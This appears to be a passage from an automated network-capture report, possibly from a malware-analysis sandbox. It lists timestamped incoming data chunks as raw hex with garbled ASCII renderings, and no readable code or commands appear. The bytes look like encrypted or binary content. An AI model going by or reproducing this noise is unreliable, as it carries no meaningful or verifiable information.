81 f4 e8 ac 6a 54 83 48 f9 0d af b9 4c 5b ac f9 ef f9 30 5d 8f 64 ba 86 0e 22 de 28 50 25 31 13 ab e9 5a 0b b5 82 d1 ce d1 0b b8 2d 13 38 d8 74 4a 61 39 19 37 f2 de f1 36 ad b1 Data Ascii: <8.[NxyoX/t%Jsi/]zZ?!oW9 ___T;:;3u:G/uC<DRG]i&)i'T4QpT5nj;qoI4f(]qjTHL[0]d"(P%1Z-8tJa976
2022-11-29 21:48:57 UTC	96	IN	Data Raw: e2 73 dd f8 3b e2 d4 02 6c f3 8d 81 c0 25 70 50 e4 8a 2a 3b f7 da c6 bf 39 34 97 8f f4 c6 19 e8 80 b4 d0 8a f3 75 5a 08 45 77 5b b7 d4 56 a3 41 bd fc 01 f6 89 f3 1c c9 d0 fb 5f 0a 45 31 b9 54 c1 f0 71 96 d7 27 b0 fc a9 e7 af 25 e5 57 0b 77 13 24 88 5c 50 17 a1 99 43 79 b6 a1 36 f6 cb 3f c4 db 70 84 46 15 28 61 7c 8e 51 33 16 c2 c8 4c f2 b1 c9 5c a0 c1 85 c1 88 fb 1a b8 f1 e8 ae 5f 4f 7d ae d5 1a a8 46 b2 5c 0b fc 80 6e 41 8a 85 49 bb dd 37 26 de 24 2e bf 3a 00 a4 93 51 83 83 7c d0 e3 cb 07 d5 8f 1d 39 d2 6e 5a 1f 24 09 32 e9 c1 60 a5 83 bb af 5a 1d d1 26 7b 97 9c 4f fd 4b 9d 64 9d 0b 80 a6 44 d9 b0 95 c2 e1 44 d0 a8 6d c5 13 93 db aa d7 ea e9 a5 f8 45 bc 6c 1d f7 78 3e 6f fd f6 04 d0 4c 07 74 39 73 96 74 b1 d0 24 50 fe c0 7b 9b f8 e5 b1 a0 03 43 42 d9 f9 Data Ascii: s;l%pP*;94uZEw[VA_E1Tq'%Ww$\PCy6?pF(a\|Q3L\_O}F\nAI7&$.:Q\|9nZ$2`Z&{OKdDDmElx>oLt9st$P{CB
2022-11-29 21:48:57 UTC	100	IN	Data Raw: 82 0a 17 f3 59 df c8 8e e4 59 6f 10 81 90 bb 97 64 ce 67 a0 c9 7d 7a 82 7b d4 98 82 90 d6 e8 bd 53 02 a0 81 4d c1 3a 30 88 01 55 4f e1 02 58 18 73 24 d5 15 2b b3 6a d6 bb 0a 88 3c 14 02 d0 3d e6 64 2a 7e fa 64 95 61 e1 a9 e5 c9 46 66 8c 95 45 ad bb 81 59 f2 11 4b 52 a6 ef 46 13 96 61 34 93 c0 d7 39 58 46 09 70 5e df 6e 0a c0 4e 9b 5c 39 2a c4 f4 b1 3f dd 5e 0a 20 64 08 79 99 34 27 89 cd b0 ea 41 fc 4c e8 15 cb 5d 3f 7d 72 ba 02 c6 ac f9 b4 01 39 18 d9 8b 16 5c 7b 4a 6c eb de 89 01 71 f5 31 88 94 7a be b5 54 a6 a2 71 36 04 f8 2c ef 30 cd 5c 37 01 d3 a0 cb 60 42 40 4f 9a 68 dc fc 65 95 65 72 18 d2 a7 1c 57 27 94 f8 7a 1e 04 46 bc ec 49 53 0d 85 55 6d f2 37 10 d2 0f 44 24 9a 19 1d 0a f8 f4 71 4e 3e 1a 3e 9d 65 4d 46 30 af ab 3b 0f c9 3d c3 c5 6d 35 08 06 5d Data Ascii: YYodg}z{SM:0UOXs$+j<=d~daFfEYKRFa49XFp^nN\9?^ dy4'AL]?}r9\{Jlq1zTq6,0\7`B@OheerW'zFISUm7D$qN>>eMF0;=m5]
2022-11-29 21:48:57 UTC	104	IN	Data Raw: f1 d4 ee 0c d9 90 55 4f 12 f8 87 97 d9 2c 4e 59 97 e1 ac 7f df fb 8e c2 39 b7 14 ac fd c3 6a a1 e7 fe d2 bf 3f d4 f2 d6 26 71 55 c3 73 e9 7c c1 f9 3b e7 93 a3 68 f3 81 75 ec 09 54 5e 88 44 0a 3a fd 00 af 14 13 03 9d 8b fd b0 3f c1 77 b4 f8 03 f3 0e 77 0d 46 08 50 40 d0 52 8d f9 9b fc 0b f4 cc 46 1f d9 da 25 51 22 5b 31 d7 c9 e9 c7 71 96 dd f9 a3 e4 92 e7 85 2f 3b 5d 09 5b 15 32 f1 00 7b 0c ab 42 56 fc 90 8c 34 ea e8 c9 c7 cd 88 ad 4e 17 3f 60 54 b8 49 cd 1d d7 06 67 f0 9a 28 25 84 c4 ea 09 a1 0d 18 92 f7 c0 99 6f 4a 77 5e fd d8 a9 9c b4 4f 1e e9 eb 90 8a 8b 8f 62 a3 f0 c7 27 aa 4d 5d 3a 39 6f 6d e9 4b 04 bb 7b fb cd c9 04 b8 30 13 38 d8 1e 62 64 39 0a 21 eb c6 0b 26 87 b9 de 5b 1e aa 2c 52 b7 9b 5e ff 4c 81 70 dc 0a 80 a8 4a ef b4 83 e0 99 8f d1 a2 05 c3 Data Ascii: UO,NY9j?&qUs\|;huT^D:?wwFP@RF%Q"[1q/;][2{BV4N?`TIg(%oJw^Ob'M]:9omK{08bd9!&[,R^LpJ
2022-11-29 21:48:57 UTC	108	IN	Data Raw: de 0b 8f 1a 32 ca c6 e3 0c 9a 3d 37 61 bf 8c b0 80 48 ad 9c a0 7d 7c 58 d0 51 70 ac 37 4b 6a f0 24 3d 5b 16 9d d6 ab 0a ef 7b af 0f f4 9a 18 12 f7 4b 8a ae 50 e4 75 6c 1e 87 40 33 18 16 a5 47 4e cc 66 84 e9 08 66 26 a1 dc be cd bc 42 03 a4 1b 2d 90 16 35 8c 00 9c 4a 28 19 5c 04 60 29 2e 14 16 bf 4d c7 bb f4 5b 2f 14 00 dc 03 85 93 ca a2 1b 6f aa 68 e3 bb e4 bf 6c 66 a0 96 4c 85 b2 9a 5c e3 08 51 53 a6 ef 46 1a 89 1d 9d 93 d1 d8 39 4c ab 00 5c 4d fc 74 13 14 b0 48 b3 3d 7b d9 c5 b3 3b e6 31 aa 22 cc 02 66 aa 31 24 a2 f6 b8 f2 43 fc 4c e8 1d db 39 c3 7a 6a 4e 1c fc b7 f2 9c c1 33 07 c1 6c 1c 70 76 4d 94 fd 25 98 10 65 e6 25 99 6a 6a 9a a0 81 a5 a5 a6 2d 3d ee 2e ed 08 d7 46 5a 06 ff ba 3b 30 40 2a 57 88 63 e0 17 eb 97 65 78 00 03 00 4e d4 3a b9 ed 77 19 c9 Data Ascii: 2=7aH}\|XQp7Kj$=[{KPul@3GNff&B-5J(\`).M[/ohlfL\QSF9L\MtH={;1"f1$CL9zjN3lpvM%e%jj-=.FZ;0@*WcexN:w
2022-11-29 21:48:57 UTC	112	IN	Data Raw: 13 4a 8a e2 9a 0c 55 e9 83 6e d6 2b c1 ec e9 40 c0 a6 c4 3b b6 cf e3 0e 3b f9 c1 5a 5e 4f 7f 6d eb 7b 6f 58 57 e5 00 67 3f c1 d3 18 8f f5 f6 42 13 d4 89 7e 4d 78 d2 99 9a 23 05 94 57 86 e2 93 8d cc fe 9b e4 1b ba 14 b7 dd bb 13 eb e4 d2 c9 a2 3f c0 55 d6 26 73 4e 1e 68 e1 14 e3 e7 30 f0 b6 55 7d fe 98 52 36 08 78 53 e4 dd 2b 25 e7 cd e3 31 2a 39 80 75 f6 91 36 f1 82 cb b2 04 f1 71 43 05 55 08 66 a5 d9 52 9a dc a0 eb f5 ff 8f f9 0c dd c7 2d 4e 0e 73 29 c4 ce c1 ee 7c 89 dc d9 a2 e0 a3 df f9 25 e5 57 11 7b 00 38 9e 46 76 13 bb 60 55 ab b1 99 1e f1 db 2c ce cd 9f 88 75 05 c1 6b 50 ab 58 cb 01 74 e2 76 f0 9a 20 8e b1 c5 ea 16 a1 ef 1c 92 fb c0 84 6e 4a 77 3d c7 1a a8 87 b8 43 09 eb e2 ff 52 87 90 72 4e f4 fa 0e cf 29 49 12 bb 02 ae ef 5c 83 af 7c d0 e3 cb 0f Data Ascii: JUn+@;;Z^Om{oXWg?B~Mx#W?U&sNh0U}R6xS+%1*9u6qCUfR-Ns)\|%W{8Fv`U,ukPXtv nJw=CRrN)I\\|
2022-11-29 21:48:57 UTC	116	IN	Data Raw: cd 59 10 93 e9 0e 73 b4 d7 7e 19 39 1e e2 e6 50 7d 58 ab 9d bf 44 66 30 52 15 73 23 29 72 34 e9 07 33 cc 97 c8 a4 bc e9 9a bf 1d 9c e3 31 19 b2 01 45 25 c2 e3 1b 89 4a 1a 62 93 88 da 6b 93 ba 4c 35 39 af 5a d1 51 06 41 33 4b 7d 9a cc 37 a5 11 a2 c5 bc 3b 51 85 ae 05 ed 80 64 c4 f5 5a 85 dc 52 e4 59 6d 0f ff 45 3d 06 0f cf b9 5e c9 7b f4 5f 3b 7b 3c cf d1 b4 a7 40 52 06 b8 f3 43 6f 18 31 82 6a b6 5c f2 0c 41 66 a8 38 2b 1e 68 44 53 ce 43 e4 6e 4c e1 10 d8 3b e1 03 e6 5f 04 6f d6 91 e2 aa e7 bf fd b4 8e 93 50 e6 56 88 59 e5 97 e3 5a 40 34 14 55 9f 0e 9c 85 df c5 0e 5c 54 01 7a 64 f5 60 32 51 b3 b6 4c 3d 47 a5 26 b3 3b de 5e 56 23 64 04 7f d4 f4 2d 89 d6 d7 0b 55 02 4b 44 53 c2 32 c7 03 3e b1 1d d4 b5 2f a7 35 19 30 cb 75 1d 63 6c 73 52 fc 09 90 d9 6c f2 08 Data Ascii: Ys~9P}XDf0Rs#)r431E%JbkL59ZQA3K}7;QdZRYmE=^{_;{<@RCo1j\Af8+hDSCnL;_oPVYZ@4U\Tzd`2QL=G&;^V#d-UKDS2>/50uclsRl
2022-11-29 21:48:57 UTC	120	IN	Data Raw: 9d 6b 6f f7 83 4f 11 08 92 35 bf ca 42 9f 30 d5 3d bd df e8 16 30 6b f2 a8 8e 85 64 f8 78 02 e3 c8 76 07 28 dc d6 5c 30 b1 7d c3 1a a3 3e 59 a4 90 14 5c c5 e8 82 62 eb 84 c4 ef 94 d1 d2 a1 d1 16 d2 dc ce 95 04 f9 cb 59 ff 23 89 7b c3 dc 6d 5c 20 3f f0 66 35 c9 fe ba 7e f7 fc d4 26 d9 9a 60 7d 6d df 2f 97 dd 04 b2 5c 97 f6 92 57 e7 7a 84 ea 08 b7 1c bf 2e a5 35 1f e2 de da b4 3d 3b 25 c3 3c 7b 59 cc 63 15 06 ca fc 39 e8 a2 59 6c fb 9c a3 c9 25 7a 53 fd df 04 3d ec f0 e6 36 1b 37 9d 8b 77 8e 6b ea a8 95 fb 05 f7 77 dc 34 46 0c 7a d9 c5 53 8b db 97 da 08 fe a5 db 63 d9 d0 f1 77 16 60 31 df d4 3f fe 5d 94 cf 2b a3 c4 b0 19 84 09 eb 54 26 53 10 35 98 7f 5f 0c a1 94 7e 9c bb 8d 3c f8 3e 3e ef cf 99 89 6a 1f 23 94 7d a5 4b e6 12 d6 b0 98 0f 65 29 76 84 c6 ea 0b Data Ascii: koO5B0=0kdxv(\0}>Y\bY#{m\ ?f5~&`}m/\Wz.5=;%<{Yc9Yl%zS=67wkw4FzScw`1?]+T&S5_~<>>j#}Ke)v
2022-11-29 21:48:57 UTC	124	IN	Data Raw: 7f fe 1b 00 70 34 44 a5 5a c8 c9 23 7a 7c a0 d1 8a fa 9a 9f 2d 03 47 54 54 af ef ec 20 f4 5f e8 63 57 38 a0 19 b4 56 85 d2 39 da 49 08 dd 1c 41 ef 70 05 1c 4c f6 f3 1f 2e 71 ab c1 7d 66 11 75 11 bf 42 4e 04 23 12 75 30 21 4b 0a fa 12 41 f4 11 b6 26 d2 1e 9f 9f 95 8f fb 20 90 86 34 38 ff e3 6d 1d 9f 25 e9 1a 94 82 b5 88 80 92 67 2f 56 7a 72 57 25 f0 be 32 4f 5b 7a 3b 36 a5 8d 94 f1 bf 04 1e f6 af 05 eb b6 87 10 f7 5a 90 82 86 c8 5b 6b 10 ba 14 41 9f 04 a0 43 7f 59 7d 7a e8 be 46 20 90 e6 8d 58 bc 53 06 9e 58 2b bc 1a 2b a0 28 48 5d f4 20 de 77 e2 3b 2b 10 27 2b 52 ce 45 6f 52 0e 0f 37 f8 ac f7 6c 35 7d c5 62 b9 6d fc 86 c9 8b 90 67 8a b9 d8 f7 31 88 59 e7 39 c6 45 58 ee f0 3c b3 1f be b3 52 dd 26 40 75 ec 77 4f d7 6b 03 13 4d b7 4a 11 d3 b4 6c b0 3b d0 11 Data Ascii: p4DZ#z\|-GTT _cW8V9IApL.q}fuBN#u0!KA& 48m%g/VzrW%2O[z;6Z[kACY}zF XSX++(H] w;+'+REoR7l5}bmg1Y9EX<R&@uwOkMJl;
2022-11-29 21:48:57 UTC	128	IN	Data Raw: 3c 79 0f d5 10 47 d8 bd 4a c1 4a 1f 9b bb 3b 65 fb 20 0a 39 3c 07 c8 e5 c3 f7 9f 25 c9 40 6e 8f b5 97 8b 92 67 2f 56 7a 72 53 25 f0 be 32 4f 5b 1e 3b 36 a5 8d 94 f1 bc 04 1e 92 af 05 eb b6 0b 19 f7 5a 93 9b 83 e7 59 6d 3c 12 e8 a6 07 05 a4 67 b3 c9 7d 7a 72 01 4e 1c a7 e0 41 c8 bc 53 26 b8 eb 2c bc 07 19 a5 07 4a 5b d8 88 26 90 7a 3a 2f 34 ea ba 52 ce df d0 5a 32 3b 31 35 3d f7 6c 15 50 0a 65 b9 71 cb 87 e3 a6 94 4d 0a ed c3 88 a8 8d 79 0d 19 54 45 c2 cb 47 0b b8 2e 76 93 c0 dd 06 53 5b 01 70 50 dc 59 06 3c 4f b1 66 b9 2f 53 f4 b1 3f f4 de aa 22 64 98 43 96 36 09 a9 33 b8 f5 54 22 53 ca 1f c3 2e eb 50 70 b0 1b fa 3d 8f 2d 11 31 03 eb 85 17 70 71 c1 4f d1 18 bc 27 9e e6 22 80 b4 4f b8 a2 aa bd a6 5f 2c 17 f6 06 78 46 4b 47 c9 04 df 4b c8 30 40 a1 64 b6 7a Data Ascii: <yGJJ;e 9<%@ng/VzrS%2O[;6ZYm<g}zrNAS&,J[&z:/4RZ2;15=lPeqMyTEG.vS[pPY<Of/S?"dC63T"S.Pp=-1pqO'"O_,xFKGK0@dz
2022-11-29 21:48:57 UTC	132	IN	Data Raw: f2 78 05 d5 f9 62 2b 2a d4 d0 74 1a ab 83 c4 1c 27 6b c2 8e 73 12 07 3d e8 82 66 5b 83 eb fe cf 61 bb a0 d5 3c 80 02 f3 82 04 e6 d8 73 d1 5c 78 7f e9 50 11 c1 5c cd f6 46 56 ca fb c7 17 d0 d1 cc 2a f9 f3 72 4d 69 ff 73 82 dd 04 a7 4c bf ca 86 5b d9 d1 06 94 91 b6 14 a2 f0 ce 18 15 e5 64 fd 99 2c 9d 36 bd 27 77 59 e4 7d fd 07 e6 e5 13 ce b9 55 6a d9 05 23 51 08 54 50 c7 9a 09 3a f7 44 cb 1c 2a 12 bd e0 f6 bd 38 c9 8d a6 f8 05 ef 5d 7d 0e 46 0a 52 34 aa cb 8a d1 bb dc 67 ff a3 f3 87 fc fd ea 7b 2a 00 30 d7 c3 e1 ea 67 96 d7 39 8b e1 a8 e7 83 0f 67 29 97 76 13 31 be 3a 7a 0c a1 04 71 aa a6 ab 14 83 c1 3f c3 ed 93 93 6a 17 25 42 51 8b 49 cb 3d 6c b4 fe f1 9a 2e 7e cd c4 ea 0d 13 de 31 83 d7 c8 d3 6e 4a 7d 69 f4 0c a8 9c a8 74 37 fa ef f9 69 08 f1 fd b1 f5 d2 Data Ascii: xb+t'ks=f[a<s\xP\FVrMisL[d,6'wY}Uj#QTP:D8]}FR4g{0g9g)v1:zq?j%BQI=l.~1nJ}it7i
2022-11-29 21:48:57 UTC	136	IN	Data Raw: 26 d7 cf e8 63 4a 30 d1 1c b4 50 b0 43 6f 6e 4a 08 df 16 25 90 e9 04 86 6d fb 6c 39 0e 97 30 e4 50 57 3d 49 9c bf 5d 5b 0c 7d 17 75 36 16 e5 59 61 13 47 da b7 2f be d3 1e 01 9a 36 9d dd 00 ed a2 19 2a f9 dc ff 1d 9f 3a c0 48 be 80 b5 91 b8 3c 34 b4 57 7c 5c f1 b3 68 bf 32 d1 5e d8 29 10 85 ff b0 dc ad 02 16 65 af 05 f4 9c 23 3a f5 5a 89 99 28 9b c0 6a 16 94 b6 d6 07 05 a0 dd 7a e4 6f 5c c8 cd 62 0d 81 e0 9f d4 bc 53 19 b5 cd 01 be 1a 37 a2 87 34 c4 f3 0a 5c 29 91 3b 2b 14 9d 9f 7f df 63 d5 9d 22 1d 11 f8 00 eb 6c 35 41 2c 48 bb 6d e5 80 63 d8 0b 66 8c 97 7a 62 a9 89 59 79 3c 79 54 7e ce 81 18 9e 0e b8 d0 dc dd 26 5d 7d 2c 72 4f d1 5b ad 40 d6 b6 4c 3f 71 26 f4 b1 3b 4e 14 87 30 42 22 8a ba 27 2f a9 96 a4 f5 54 1d 47 ec 32 c1 32 c5 57 f4 ce 84 d1 bf f5 94 Data Ascii: &cJ0PConJ%ml90PW=I][}u6YaG/6*:H<4W\|\h2^)e#:Z(jzo\bS74\);+c"l5A,HmcfzbYy<yT~&]},rO[@L?q&;N0B"'/TG22W
2022-11-29 21:48:57 UTC	140	IN	Data Raw: 9c 6c 49 d8 2e 45 14 23 b6 0f 61 44 1c 5f bb e6 e9 2e 6a 6f f3 b0 1b 11 08 ba af 9a e7 5b b9 10 a0 29 b6 f4 d3 8a 13 7c 0c b4 8a aa 7e f3 7e 2f 73 48 ee 2a 2a cf fd 39 35 a9 83 58 13 8c 07 7d af 16 14 27 55 c9 21 42 c1 a6 d9 e0 c1 6c d1 a1 d3 16 26 a0 7f 83 04 fd e1 3d fe 5e 78 e3 e6 fb 7d 7e 7d ab f0 66 3f eb 54 e3 8d f5 e3 c8 24 f4 98 73 4b 43 5d f8 0e dc 04 bc 7d f0 e5 84 5b 45 de a9 fb 2e 97 73 a4 d0 a4 39 d0 c1 fe d8 a3 15 96 14 d7 20 5d db ba e2 ea 07 e2 d8 53 e1 bb 55 f6 d6 aa 4c ee 29 3c 56 e7 f1 28 fc d3 de ee 26 13 19 9f 8b f1 97 be 97 19 b1 f8 01 d1 1c 52 0c 46 96 5d 9b c6 74 ab b8 bd fc 0b de 64 d7 1d d9 cf f1 75 27 6e 31 d1 e9 43 81 e8 97 d7 23 83 a6 a8 e7 85 bf c0 7a 1f 51 33 5f 9c 57 7b 2c 70 ba 54 87 ad a5 19 ec c0 39 e9 4b f0 1c 6b 17 3b Data Ascii: lI.E#aD_.jo[)\|~~/sH**95X}'U!Bl&=^x}~}f?T$sKC]}[E.s9 ]SUL)<V(&RF]tdu'n1C#zQ3_W{,pT9Kk;
2022-11-29 21:48:57 UTC	144	IN	Data Raw: da ae bd e4 1e 98 d2 46 d8 7a 34 da 7e 28 5a de 72 01 47 4c 07 74 14 ba 8f 77 ca 53 00 7d e8 f8 68 69 f8 9e bf 81 07 6b 54 ce 95 ce d6 2b d6 d3 ee 49 d1 66 65 1f b4 52 ba 26 13 f7 4b 92 fe 1b d1 b7 c9 e7 1e 48 d6 5e 0f 02 71 31 fb 74 5f 1a 57 9c b9 68 cc 5a c9 14 75 34 1c 87 25 f8 12 dd fb ba d9 99 f3 fa 99 bf 1b af cf 0c 0a a3 01 02 f4 c1 e3 1b b5 a7 b7 f9 92 82 b1 b7 77 b8 4a 2d cc 59 75 c0 7d 49 5a 30 4b 7b d5 0d 1a a5 17 af f4 80 20 3e 7f 85 83 95 0f 0a 17 f3 7a 69 b1 ae e5 c3 4e 3b 82 b0 1f e0 07 a0 47 7f f7 51 7a e8 3b 68 25 ac c2 ad ce 96 d1 78 27 e4 2c b8 3a d6 8a 05 4a c7 d7 27 49 2f 5b dd 29 14 07 9a 1b e2 45 f5 69 0b 30 13 d8 3b dd ea 4b c4 05 65 bd 4d 0b a8 e1 a6 08 42 a1 81 7c a9 40 8b 59 e3 39 05 69 58 ee 75 33 b6 23 9a 93 c6 f7 a0 3e cc 00 Data Ascii: Fz4~(ZrGLtwS}hikT+IfeR&KH^q1t_WhZu4%wJ-Yu}IZ0K{ >ziN;GQz;h%x',:J'I/[)Ei0;KeMB\|@Y9iXu3#>
2022-11-29 21:48:57 UTC	148	IN	Data Raw: 09 8b 94 d2 1e 01 db 30 dc f7 2f 2d 1d f2 9c 0b 11 4e 42 46 d7 ec c7 a2 cd 7d c1 11 e6 ec 0c 63 da b4 74 a5 15 14 bb bf db aa 94 83 5d 42 af 95 7f 31 e8 84 e6 33 b3 d8 d0 90 9b 4f ba 55 74 ab ae 31 57 a9 d8 ea 58 c1 59 62 ea 3d 89 38 d4 59 53 5a bf 87 87 90 13 16 2d c7 10 c2 b7 49 91 87 99 93 70 66 fb 20 a0 88 db 28 ec 58 40 9b 72 08 7d 31 8f e5 08 86 a1 d1 b3 b8 10 9b a2 db 20 f6 80 be c1 0e f0 ad 3f 9a 23 56 15 a0 b7 02 29 60 ee d7 51 0b ac 80 ea a3 ce dc ba 51 88 dc 4b 09 39 8b ec bf e7 08 bc 5b 8a b7 d7 51 dd f7 93 aa 0a be 1f ad c7 e3 40 4e ac b0 c5 a9 76 ff 47 99 2c 40 62 e4 25 e7 78 d3 8d 5a ca 98 76 5a 8e fb 7a e1 20 64 31 de c5 3c 0c db bc 90 4f 59 57 af bb 97 dc 4e 82 51 4f 11 ee 22 e6 d3 c7 8b c1 ac 29 4e 93 40 1a 71 67 d0 28 71 23 d3 59 40 6b Data Ascii: 0/-NBF}ct]B13OUt1WXYb=8YSZ-Ipf (X@r}1 ?#V)`QQK9[Q@NvG,@b%xZvZz d1<OYWNQO")N@qg(q#Y@k
2022-11-29 21:48:57 UTC	152	IN	Data Raw: 60 7c aa 06 39 4b 63 55 7e bb 84 4b 63 d6 ed ef 20 4d fe 74 38 c7 f4 26 85 18 c7 54 8c 7f fb d7 6e ca bb b6 f6 fc 44 d2 b4 05 a5 7e f8 d6 a6 bd e4 f9 a7 c7 59 e4 7b 04 e6 6a 36 59 f1 e6 79 dd 62 3e 4b 53 6e af 57 bb d8 03 62 cd fd 7d f1 83 8c 8b 8a 2e 27 37 bd 9f ff de 22 bb bf 83 67 6d c0 23 88 21 d7 65 06 ce 21 d6 94 2f e3 01 47 72 82 88 a5 1c a5 d2 ac f0 d3 36 93 b5 a1 87 46 69 a7 a1 c5 b7 fc c7 9e d3 80 d7 1d a5 f5 7b 2d 71 0a 18 e7 71 52 ba 2f 36 d3 ea 40 b6 fa 27 3b 13 ad 1d a1 4c ef 2f 21 1e 21 26 1b f9 8e ed c4 f0 4a d2 e5 2f a2 94 d7 7a a0 ae 27 9f 2b 77 05 80 9d dc 34 8f 75 79 f5 86 69 ca 2a 01 1b 4b f2 c0 bf 03 21 95 ac 94 1d f7 e8 4f de ce 4c bd d6 b5 ce bb f0 83 fe 15 49 d8 a2 76 da 52 7b ca 71 00 15 bd 7c 14 5a 26 63 64 14 06 d1 33 aa 3b 97 Data Ascii: `\|9KcU~Kc Mt8&TnD~Y{j6Yyb>KSnWb}.'7"gm#!e!/Gr6Fi{-qqR/6@';L/!!&J/z'+w4uyi*K!OLIvR{q\|Z&cd3;
2022-11-29 21:48:57 UTC	156	IN	Data Raw: 83 5f 40 41 54 38 fe a2 cc 00 c6 16 8d 30 b6 27 f7 17 53 2a d0 ea 85 f8 7b 8b 3a 57 72 17 e9 f9 90 8d 9d fe bb b4 01 6a fc 97 d4 cc 20 79 8e c1 84 1e 22 b0 59 a5 94 52 04 68 80 dc 4c 5e 12 46 5c c9 a4 88 a7 84 21 c8 1b f4 aa 1e 01 9c fe 3c b9 4c 30 91 92 b3 ba bc e0 6f 25 75 50 fd a1 61 0f 21 b4 2b 59 48 47 16 c6 65 c6 e2 22 33 a7 dc 65 0a 5d e9 75 e7 de 59 dc 6b 83 51 dc 8f 89 3d 50 04 75 db d2 bd 52 da 08 76 87 02 18 5b 56 ba ac 29 45 d5 e2 bd 52 c3 67 3d b4 7a 12 22 13 e3 84 79 d8 ea d1 e3 fa 57 c6 aa da 23 b8 d2 b1 93 09 e2 93 5d e0 5c 6b 7d db d5 69 77 64 aa 87 49 5e ac 89 ed bc d0 db c4 38 b7 e2 75 65 1b ae 83 ea a6 04 c3 26 f8 8a ba 7e ee c8 10 6f 8b 21 93 55 4d 52 e5 88 18 75 40 7b eb 7b ca 3e fb be 8b 1a a4 33 e1 27 21 e7 06 78 80 ab 0d 58 a7 28 Data Ascii: _@AT80'S*{:Wrj y"YRhL^F\!<L0o%uPa!+YHGe"3e]uYkQ=PuRv[V)ERg=z"yW#]\k}iwdI^8ue&~o!UMRu@{{>3'!xX(
2022-11-29 21:48:57 UTC	160	IN	Data Raw: fd 17 06 b2 6d 1e d8 41 38 f8 6a 35 98 0b c1 66 d4 9e 7b 58 b8 9e 61 14 23 aa 3f 4d 46 1c 59 91 65 97 b6 6b 6f f7 90 7f 61 09 c8 34 ba ca 4b 9f 31 c4 2b b6 f4 f3 1b 30 0e 0d bc a2 86 7c f1 78 05 f4 26 77 ea 2b b9 dc 41 37 a8 83 c1 36 a4 14 5b 8f 01 17 27 55 f4 82 63 c1 ae c6 e9 e8 41 d3 af d5 3c a0 c3 e6 87 04 f6 c1 5b fd 4e 78 3a c4 a4 6e 45 5d cb f2 77 3f c1 fa c7 8d 87 fd de 0c 5c 98 49 4d 10 df 8b 96 dd 04 b5 5a 97 e7 01 59 e3 fb fd ea 0a b6 14 a6 11 a5 19 15 f0 fc 9a b4 44 bb 14 d7 26 77 1a c3 7b eb 1a e6 be 3b 9a bb 57 6c f3 87 ae c9 09 54 49 e7 b9 08 46 f7 dc ee 31 3b f0 9a 8b f7 20 3a a3 80 36 f8 07 f0 75 50 7e 47 0c 78 1b d6 1e 8b 41 bf fe 0b fe a3 96 1f d9 d0 e6 5d 46 6c a5 d7 c8 c0 ff 71 e4 d6 27 a3 49 a8 b1 85 ba e5 54 0f 77 13 38 99 57 7b 19 Data Ascii: mA8j5f{Xa#?MFYekoa4K1+0\|x&w+A76['UcA<[Nx:nE]w?\IMZYD&w{;WlTIF1; :6uP~GxA]Flq'ITw8W{
2022-11-29 21:48:57 UTC	164	IN	Data Raw: c6 0b 80 ba 62 c5 b3 5a ef f2 45 f0 9f 03 e5 43 d8 ce ae fe c3 6d b6 d7 46 9f 48 1c f7 7c 28 4a f4 d0 6b 58 4d 02 70 a0 65 8d 77 ca c9 34 50 09 df ce 8e ff 9e 33 9f 03 47 54 ce 9c c2 f3 01 3c d0 ed 63 a7 27 fc 1e b4 56 8c c5 63 f6 08 0e de 36 b7 d1 e9 04 1c 48 c0 7e 6d 2f d5 37 e1 50 ff 75 55 9c bf 42 58 24 99 17 f3 30 39 63 3b ae 12 47 de 97 de bf a1 1f c3 b7 1e 8f fb 20 0a a3 99 2a c8 e3 91 1c 95 26 ce 60 d3 da b5 97 92 ba 5c 2d 5b 7b 70 d2 53 69 bf 32 4b 7b 75 3b 20 85 65 b0 b8 a5 2a 3e 79 af 05 eb 16 0b 01 d7 28 8e dd a6 ec 59 ef 4e 90 96 3f 06 13 a0 2b 4b 4f 7d 71 e8 24 3a 0d 81 c0 ad de bc 21 07 3b ed 27 bc 82 68 88 05 4a 5d e4 0a 99 08 71 39 20 14 47 e0 52 ce 45 f5 61 23 6f 10 17 35 fc 6c 5d 00 04 65 b9 6d f2 aa 93 a7 12 65 80 93 5a 89 a8 89 d9 e3 Data Ascii: bZECmFH\|(JkXMpew4P3GT<c'Vc6H~m/7PuUBX$09c;G &`\-[{pSi2K{u; e>y(YN?+KO}q$:!;'hJ]q9 GREa#o5l]emeZ
2022-11-29 21:48:57 UTC	168	IN	Data Raw: ed 97 63 70 59 25 2c 76 64 3b ed bc 7f 01 1f 55 b2 e4 02 76 ec 90 e5 6c 5a 7e 16 d4 81 f3 19 7b 97 ea c6 e3 ae 62 fe 7a 0a 36 82 7c b5 4f 63 a9 56 6a 51 cc 97 fa df 6c 35 0c 1f 4f 2c e6 b0 6d 19 f8 40 25 15 23 aa 27 4a 4e 65 6d 09 67 c7 b7 6f 2a f6 90 7f 13 0e b2 9b aa f9 4e ce 30 fc 6e b7 f4 f3 16 31 74 b0 bc 5c 86 2d f3 3c 40 f4 36 77 2b 2c c3 c5 42 04 ad d1 c2 4e e4 14 5b 8f 73 10 2f 67 f7 7c 67 93 a6 42 a9 e8 41 d3 a1 d3 34 2a d1 c8 83 57 f9 79 1e fd 5e 78 79 c5 de f6 57 c5 ce a1 66 fb 8e fa c7 8d f5 fa d6 ab f8 25 77 19 69 27 c3 96 dd 04 b8 5b 9f 55 a5 91 db af 84 ee 4e b6 14 a6 d0 a2 11 0d f9 b7 d9 e1 3d 83 50 d6 26 77 59 c2 73 cf 1b 26 f8 6e e3 ff 13 6d f3 87 5d ce 01 04 5a 02 ef 5e 3a 8f 98 ef 31 3b 34 9b 83 96 b3 d3 f7 d6 b0 7c 43 f0 75 50 0c 57 Data Ascii: cpY%,vd;UvlZ~{bz6\|OcVjQl5O,m@%#'JNemgoN0n1t\-<@6w+,BN[s/g\|gBA4Wy^xyWf%wi'[UN=P&wYs&nm]Z^:1;4\|CuPW
